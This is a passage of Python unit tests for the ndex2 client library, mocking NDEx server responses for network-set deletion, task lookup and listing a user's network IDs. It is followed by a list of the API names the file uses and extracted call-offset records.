                self.assertEqual('networkset id cannot be None',
                                 str(ne))
    def test_delete_networkset_non_string_passed_in(self):
        """Verify delete_networkset() raises NDExInvalidParameterError
        when the networkset id is not a string."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            ndex.set_debug_mode(True)
            try:
                ndex.delete_networkset(True)
                self.fail('Expected exception')
            except NDExInvalidParameterError as ne:
                self.assertEqual('networkset id must be a string',
                                 str(ne))
    def test_delete_networkset_not_authorized(self):
        """Verify delete_networkset() raises NDExUnauthorizedError when
        no credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.delete_networkset('someid')
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('This method requires user authentication',
                                 str(ne))
    def test_delete_networkset_success(self):
        """Verify delete_networkset() returns None when the server
        responds with HTTP 204."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
                     status_code=204,
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            self.assertEqual(None, ndex.delete_networkset('someid'))
    def test_delete_networkset_server_says_not_authorized(self):
        """Verify delete_networkset() raises NDExUnauthorizedError when
        the server responds with HTTP 401."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
                     status_code=401,
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex.delete_networkset('someid')
                self.fail('Expected exception')
            except NDExUnauthorizedError as ne:
                self.assertEqual('Not authorized', str(ne))
    def test_delete_networkset_server_says_not_found(self):
        """Verify delete_networkset() raises NDExNotFoundError when the
        server responds with HTTP 404."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
                     status_code=404,
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex.delete_networkset('someid')
                self.fail('Expected exception')
            except NDExNotFoundError as ne:
                self.assertEqual('Network set with id: someid not found',
                                 str(ne))
    def test_delete_networkset_server_500_error_no_json(self):
        """Verify delete_networkset() raises a generic NDExError when
        the server responds 500 with no JSON body."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
                     status_code=500,
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex.delete_networkset('someid')
                self.fail('Expected exception')
            except NDExError as ne:
                self.assertEqual('Unknown error server returned '
                                 'status code: 500',
                                 str(ne))
    def test_delete_networkset_server_503_with_json(self):
        """Verify delete_networkset() raises NDExError including the
        server's JSON error payload when the server responds 503."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.delete(client.DEFAULT_SERVER + '/v2/networkset/someid',
                     status_code=503,
                     json={"errorCode": "string",
                           "message": "string",
                           "description": "string",
                           "stackTrace": "string",
                           "threadId": "string",
                           "timeStamp": "2019-09-09T16:36:25.699Z"},
                     headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            try:
                ndex.delete_networkset('someid')
                self.fail('Expected exception')
            except NDExError as ne:
                self.assertTrue('Unknown error server returned '
                                'status code: 503 : ' in str(ne))
    def test_get_task_by_id_no_auth(self):
        """Verify get_task_by_id() raises NDExUnauthorizedError when no
        credentials were supplied."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            ndex = Ndex2()
            try:
                ndex.get_task_by_id('someid')
                self.fail('Expected Exception')
            except NDExUnauthorizedError:
                pass
    def test_get_task_by_id_success(self):
        """Verify get_task_by_id() returns the JSON from the NDEx v2
        task endpoint."""
        with requests_mock.mock() as m:
            m.get(self.get_rest_admin_status_url(),
                  json=self.get_rest_admin_status_dict())
            m.get(client.DEFAULT_SERVER + '/v2/task/someid',
                  status_code=200,
                  json={'hi': 'bye'},
                  headers={'Content-Type': 'application/json'})
            ndex = Ndex2(username='bob', password='<PASSWORD>')
            res = ndex.get_task_by_id('someid')
            self.assertEqual('bye', res['hi'])
def test_add_networks_to_networkset(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
m.post(client.DEFAULT_SERVER + '/v2/networkset/aid/members',
status_code=200,
json='',
headers={'Content-Type': 'application/json'})
ndex = Ndex2(username='bob', password='<PASSWORD>')
res = ndex.add_networks_to_networkset('aid', ['someid'])
self.assertEqual('', res)
def test_get_network_ids_for_user_invalid_offset_limit(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
ndex = Ndex2()
try:
ndex.get_network_ids_for_user('bob', limit=None, offset=5)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Limit must be set to a positive '
'number to use offset', str(ne))
# try where limit is str and offset is None
try:
ndex.get_network_ids_for_user('bob', limit='ha', offset=None)
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Limit must be an int', str(ne))
# try where limit is str and offset is str
try:
ndex.get_network_ids_for_user('bob', offset='3')
self.fail('Expected NDExInvalidParameterError')
except NDExInvalidParameterError as ne:
self.assertEqual('Offset must be an int', str(ne))
def test_get_network_ids_for_user_success_no_ids(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(resurl, json={'externalId': '12345'},
headers={'Content-Type': 'application/json'})
resurl = client.DEFAULT_SERVER + '/v2/user/12345/networksummary?offset=0&limit=1000'
m.get(resurl,
json=[],
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_network_ids_for_user('bob')
self.assertEqual([], res)
def test_get_network_ids_for_user_success_with_ids(self):
with requests_mock.mock() as m:
m.get(self.get_rest_admin_status_url(),
json=self.get_rest_admin_status_dict())
resurl = client.DEFAULT_SERVER + '/v2/user?username=bob'
m.get(resurl, json={'externalId': '12345'},
headers={'Content-Type': 'application/json'})
resurl = client.DEFAULT_SERVER + '/v2/user/12345/networksummary?offset=0&limit=1000'
m.get(resurl,
json=[{'externalId': '1'}, {'externalId': '2'}],
headers={'Content-Type': 'application/json'})
ndex = Ndex2()
res = ndex.get_network_ids_for_user('bob')
self.assertEqual(2, len(res))
self.assertTrue('1' in res)
self.assertTrue('2' in res)
|
[
"ndex2.client.DecimalEncoder",
"unittest.mock.MagicMock",
"json.loads",
"decimal.Decimal",
"requests_mock.mock",
"json.dumps",
"ndex2.client.Ndex2",
"numpy.int32",
"numpy.int64",
"os.getenv"
] |
[((1625, 1641), 'ndex2.client.DecimalEncoder', 'DecimalEncoder', ([], {}), '()\n', (1639, 1641), False, 'from ndex2.client import DecimalEncoder\n'), ((2484, 2507), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (2489, 2507), False, 'from ndex2.client import Ndex2\n'), ((3141, 3250), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""xxxlocalhost"""', 'username': '"""bob"""', 'password': '"""<PASSWORD>"""', 'user_agent': '"""yo"""', 'debug': '(True)', 'timeout': '(1)'}), "(host='xxxlocalhost', username='bob', password='<PASSWORD>',\n user_agent='yo', debug=True, timeout=1)\n", (3146, 3250), False, 'from ndex2.client import Ndex2\n'), ((7785, 7808), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (7790, 7808), False, 'from ndex2.client import Ndex2\n'), ((8097, 8120), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (8102, 8120), False, 'from ndex2.client import Ndex2\n'), ((8262, 8302), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""', 'user_agent': '"""hi"""'}), "(host='localhost', user_agent='hi')\n", (8267, 8302), False, 'from ndex2.client import Ndex2\n'), ((8538, 8561), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (8543, 8561), False, 'from ndex2.client import Ndex2\n'), ((9045, 9068), 'ndex2.client.Ndex2', 'Ndex2', ([], {'host': '"""localhost"""'}), "(host='localhost')\n", (9050, 9068), False, 'from ndex2.client import Ndex2\n'), ((9266, 9277), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9275, 9277), False, 'from unittest.mock import MagicMock\n'), ((9303, 9314), 'unittest.mock.MagicMock', 'MagicMock', ([], {}), '()\n', (9312, 9314), False, 'from unittest.mock import MagicMock\n'), ((834, 864), 'os.getenv', 'os.getenv', (['"""NDEX2_TEST_SERVER"""'], {}), "('NDEX2_TEST_SERVER')\n", (843, 864), False, 'import os\n'), ((1902, 1920), 'decimal.Decimal', 
'decimal.Decimal', (['(5)'], {}), '(5)\n', (1917, 1920), False, 'import decimal\n'), ((2031, 2043), 'numpy.int64', 'np.int64', (['(12)'], {}), '(12)\n', (2039, 2043), True, 'import numpy as np\n'), ((3793, 3813), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (3811, 3813), False, 'import requests_mock\n'), ((3949, 3971), 'ndex2.client.Ndex2', 'Ndex2', ([], {'user_agent': 'None'}), '(user_agent=None)\n', (3954, 3971), False, 'from ndex2.client import Ndex2\n'), ((4096, 4116), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (4114, 4116), False, 'import requests_mock\n'), ((4299, 4306), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (4304, 4306), False, 'from ndex2.client import Ndex2\n'), ((4809, 4829), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (4827, 4829), False, 'import requests_mock\n'), ((5144, 5151), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (5149, 5151), False, 'from ndex2.client import Ndex2\n'), ((5655, 5675), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (5673, 5675), False, 'import requests_mock\n'), ((5927, 5934), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (5932, 5934), False, 'from ndex2.client import Ndex2\n'), ((6436, 6456), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (6454, 6456), False, 'import requests_mock\n'), ((7153, 7173), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (7171, 7173), False, 'import requests_mock\n'), ((7309, 7316), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (7314, 7316), False, 'from ndex2.client import Ndex2\n'), ((10049, 10069), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (10067, 10069), False, 'import requests_mock\n'), ((10274, 10281), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (10279, 10281), False, 'from ndex2.client import Ndex2\n'), ((10421, 10441), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (10439, 10441), False, 'import requests_mock\n'), ((11030, 11037), 
'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (11035, 11037), False, 'from ndex2.client import Ndex2\n'), ((11213, 11233), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (11231, 11233), False, 'import requests_mock\n'), ((11822, 11829), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (11827, 11829), False, 'from ndex2.client import Ndex2\n'), ((12184, 12204), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (12202, 12204), False, 'import requests_mock\n'), ((12793, 12800), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (12798, 12800), False, 'from ndex2.client import Ndex2\n'), ((13162, 13182), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (13180, 13182), False, 'import requests_mock\n'), ((13507, 13514), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (13512, 13514), False, 'from ndex2.client import Ndex2\n'), ((13728, 13748), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (13746, 13748), False, 'import requests_mock\n'), ((14077, 14084), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (14082, 14084), False, 'from ndex2.client import Ndex2\n'), ((14302, 14322), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (14320, 14322), False, 'import requests_mock\n'), ((14659, 14666), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (14664, 14666), False, 'from ndex2.client import Ndex2\n'), ((14865, 14885), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (14883, 14885), False, 'import requests_mock\n'), ((15222, 15229), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (15227, 15229), False, 'from ndex2.client import Ndex2\n'), ((15422, 15442), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (15440, 15442), False, 'import requests_mock\n'), ((15771, 15778), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (15776, 15778), False, 'from ndex2.client import Ndex2\n'), ((15985, 16005), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (16003, 16005), False, 
'import requests_mock\n'), ((16334, 16341), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (16339, 16341), False, 'from ndex2.client import Ndex2\n'), ((16614, 16634), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (16632, 16634), False, 'import requests_mock\n'), ((17023, 17030), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (17028, 17030), False, 'from ndex2.client import Ndex2\n'), ((17294, 17314), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (17312, 17314), False, 'import requests_mock\n'), ((17596, 17603), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (17601, 17603), False, 'from ndex2.client import Ndex2\n'), ((17798, 17818), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (17816, 17818), False, 'import requests_mock\n'), ((18103, 18110), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (18108, 18110), False, 'from ndex2.client import Ndex2\n'), ((18323, 18343), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (18341, 18343), False, 'import requests_mock\n'), ((18633, 18640), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (18638, 18640), False, 'from ndex2.client import Ndex2\n'), ((18859, 18879), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (18877, 18879), False, 'import requests_mock\n'), ((19014, 19021), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (19019, 19021), False, 'from ndex2.client import Ndex2\n'), ((20062, 20082), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (20080, 20082), False, 'import requests_mock\n'), ((20403, 20410), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (20408, 20410), False, 'from ndex2.client import Ndex2\n'), ((20573, 20593), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (20591, 20593), False, 'import requests_mock\n'), ((20918, 20925), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (20923, 20925), False, 'from ndex2.client import Ndex2\n'), ((21053, 21073), 'requests_mock.mock', 'requests_mock.mock', 
([], {}), '()\n', (21071, 21073), False, 'import requests_mock\n'), ((21435, 21442), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (21440, 21442), False, 'from ndex2.client import Ndex2\n'), ((21772, 21792), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (21790, 21792), False, 'import requests_mock\n'), ((22087, 22094), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (22092, 22094), False, 'from ndex2.client import Ndex2\n'), ((22375, 22395), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (22393, 22395), False, 'import requests_mock\n'), ((22734, 22741), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (22739, 22741), False, 'from ndex2.client import Ndex2\n'), ((23064, 23084), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (23082, 23084), False, 'import requests_mock\n'), ((23220, 23227), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (23225, 23227), False, 'from ndex2.client import Ndex2\n'), ((23843, 23863), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (23861, 23863), False, 'import requests_mock\n'), ((24194, 24201), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (24199, 24201), False, 'from ndex2.client import Ndex2\n'), ((24359, 24379), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (24377, 24379), False, 'import requests_mock\n'), ((24656, 24663), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (24661, 24663), False, 'from ndex2.client import Ndex2\n'), ((25015, 25035), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (25033, 25035), False, 'import requests_mock\n'), ((25307, 25314), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (25312, 25314), False, 'from ndex2.client import Ndex2\n'), ((25660, 25680), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (25678, 25680), False, 'import requests_mock\n'), ((25967, 25974), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (25972, 25974), False, 'from ndex2.client import Ndex2\n'), ((26281, 26301), 
'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (26299, 26301), False, 'import requests_mock\n'), ((26437, 26444), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (26442, 26444), False, 'from ndex2.client import Ndex2\n'), ((27196, 27216), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (27214, 27216), False, 'import requests_mock\n'), ((27352, 27359), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (27357, 27359), False, 'from ndex2.client import Ndex2\n'), ((27806, 27826), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (27824, 27826), False, 'import requests_mock\n'), ((27962, 27969), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (27967, 27969), False, 'from ndex2.client import Ndex2\n'), ((28413, 28433), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (28431, 28433), False, 'import requests_mock\n'), ((28569, 28576), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (28574, 28576), False, 'from ndex2.client import Ndex2\n'), ((29018, 29038), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (29036, 29038), False, 'import requests_mock\n'), ((29358, 29365), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (29363, 29365), False, 'from ndex2.client import Ndex2\n'), ((29680, 29700), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (29698, 29700), False, 'import requests_mock\n'), ((29951, 29958), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (29956, 29958), False, 'from ndex2.client import Ndex2\n'), ((30216, 30236), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (30234, 30236), False, 'import requests_mock\n'), ((30534, 30541), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (30539, 30541), False, 'from ndex2.client import Ndex2\n'), ((30785, 30805), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (30803, 30805), False, 'import requests_mock\n'), ((30941, 30948), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (30946, 30948), False, 'from 
ndex2.client import Ndex2\n'), ((31235, 31255), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (31253, 31255), False, 'import requests_mock\n'), ((31391, 31398), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (31396, 31398), False, 'from ndex2.client import Ndex2\n'), ((31686, 31706), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (31704, 31706), False, 'import requests_mock\n'), ((31842, 31849), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (31847, 31849), False, 'from ndex2.client import Ndex2\n'), ((32150, 32170), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (32168, 32170), False, 'import requests_mock\n'), ((32554, 32598), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (32559, 32598), False, 'from ndex2.client import Ndex2\n'), ((33379, 33399), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (33397, 33399), False, 'import requests_mock\n'), ((33804, 33848), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (33809, 33848), False, 'from ndex2.client import Ndex2\n'), ((34645, 34665), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (34663, 34665), False, 'import requests_mock\n'), ((35067, 35111), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (35072, 35111), False, 'from ndex2.client import Ndex2\n'), ((36000, 36020), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (36018, 36020), False, 'import requests_mock\n'), ((36404, 36448), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (36409, 36448), False, 'from ndex2.client import Ndex2\n'), ((37354, 37374), 'requests_mock.mock', 'requests_mock.mock', ([], {}), 
'()\n', (37372, 37374), False, 'import requests_mock\n'), ((37761, 37805), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (37766, 37805), False, 'from ndex2.client import Ndex2\n'), ((38983, 39003), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (39001, 39003), False, 'import requests_mock\n'), ((39411, 39455), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (39416, 39455), False, 'from ndex2.client import Ndex2\n'), ((40635, 40655), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (40653, 40655), False, 'import requests_mock\n'), ((40791, 40798), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (40796, 40798), False, 'from ndex2.client import Ndex2\n'), ((45186, 45201), 'json.loads', 'json.loads', (['res'], {}), '(res)\n', (45196, 45201), False, 'import json\n'), ((45567, 45587), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (45585, 45587), False, 'import requests_mock\n'), ((45723, 45730), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (45728, 45730), False, 'from ndex2.client import Ndex2\n'), ((46273, 46293), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (46291, 46293), False, 'import requests_mock\n'), ((46429, 46473), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (46434, 46473), False, 'from ndex2.client import Ndex2\n'), ((47048, 47068), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (47066, 47068), False, 'import requests_mock\n'), ((47217, 47261), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (47222, 47261), False, 'from ndex2.client import Ndex2\n'), ((47944, 47964), 'requests_mock.mock', 'requests_mock.mock', 
([], {}), '()\n', (47962, 47964), False, 'import requests_mock\n'), ((48603, 48647), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (48608, 48647), False, 'from ndex2.client import Ndex2\n'), ((49024, 49055), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (49034, 49055), False, 'import json\n'), ((49169, 49189), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (49187, 49189), False, 'import requests_mock\n'), ((49325, 49332), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (49330, 49332), False, 'from ndex2.client import Ndex2\n'), ((49809, 49829), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (49827, 49829), False, 'import requests_mock\n'), ((50468, 50512), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (50473, 50512), False, 'from ndex2.client import Ndex2\n'), ((50627, 50658), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (50637, 50658), False, 'import json\n'), ((50787, 50807), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (50805, 50807), False, 'import requests_mock\n'), ((50943, 50950), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (50948, 50950), False, 'from ndex2.client import Ndex2\n'), ((51430, 51450), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (51448, 51450), False, 'import requests_mock\n'), ((52089, 52133), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (52094, 52133), False, 'from ndex2.client import Ndex2\n'), ((52249, 52280), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (52259, 52280), False, 'import json\n'), ((52417, 52437), 'requests_mock.mock', 'requests_mock.mock', ([], {}), 
'()\n', (52435, 52437), False, 'import requests_mock\n'), ((52573, 52580), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (52578, 52580), False, 'from ndex2.client import Ndex2\n'), ((53083, 53103), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (53101, 53103), False, 'import requests_mock\n'), ((53742, 53786), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (53747, 53786), False, 'from ndex2.client import Ndex2\n'), ((53910, 53941), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (53920, 53941), False, 'import json\n'), ((54234, 54254), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (54252, 54254), False, 'import requests_mock\n'), ((54403, 54447), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (54408, 54447), False, 'from ndex2.client import Ndex2\n'), ((54828, 54848), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (54846, 54848), False, 'import requests_mock\n'), ((54984, 54991), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (54989, 54991), False, 'from ndex2.client import Ndex2\n'), ((55458, 55478), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (55476, 55478), False, 'import requests_mock\n'), ((56117, 56161), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': '"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (56122, 56161), False, 'from ndex2.client import Ndex2\n'), ((56276, 56307), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (56286, 56307), False, 'import json\n'), ((56487, 56507), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (56505, 56507), False, 'import requests_mock\n'), ((57146, 57190), 'ndex2.client.Ndex2', 'Ndex2', ([], {'username': '"""bob"""', 'password': 
'"""<PASSWORD>"""'}), "(username='bob', password='<PASSWORD>')\n", (57151, 57190), False, 'from ndex2.client import Ndex2\n'), ((57306, 57337), 'json.loads', 'json.loads', (['m.last_request.text'], {}), '(m.last_request.text)\n', (57316, 57337), False, 'import json\n'), ((57466, 57486), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (57484, 57486), False, 'import requests_mock\n'), ((57823, 57830), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (57828, 57830), False, 'from ndex2.client import Ndex2\n'), ((58108, 58128), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (58126, 58128), False, 'import requests_mock\n'), ((58484, 58491), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (58489, 58491), False, 'from ndex2.client import Ndex2\n'), ((58769, 58789), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (58787, 58789), False, 'import requests_mock\n'), ((59136, 59143), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (59141, 59143), False, 'from ndex2.client import Ndex2\n'), ((59441, 59461), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (59459, 59461), False, 'import requests_mock\n'), ((59817, 59824), 'ndex2.client.Ndex2', 'Ndex2', ([], {}), '()\n', (59822, 59824), False, 'from ndex2.client import Ndex2\n'), ((60105, 60125), 'requests_mock.mock', 'requests_mock.mock', ([], {}), '()\n', (60123, 60125), False, 'import requests_mock\n'), 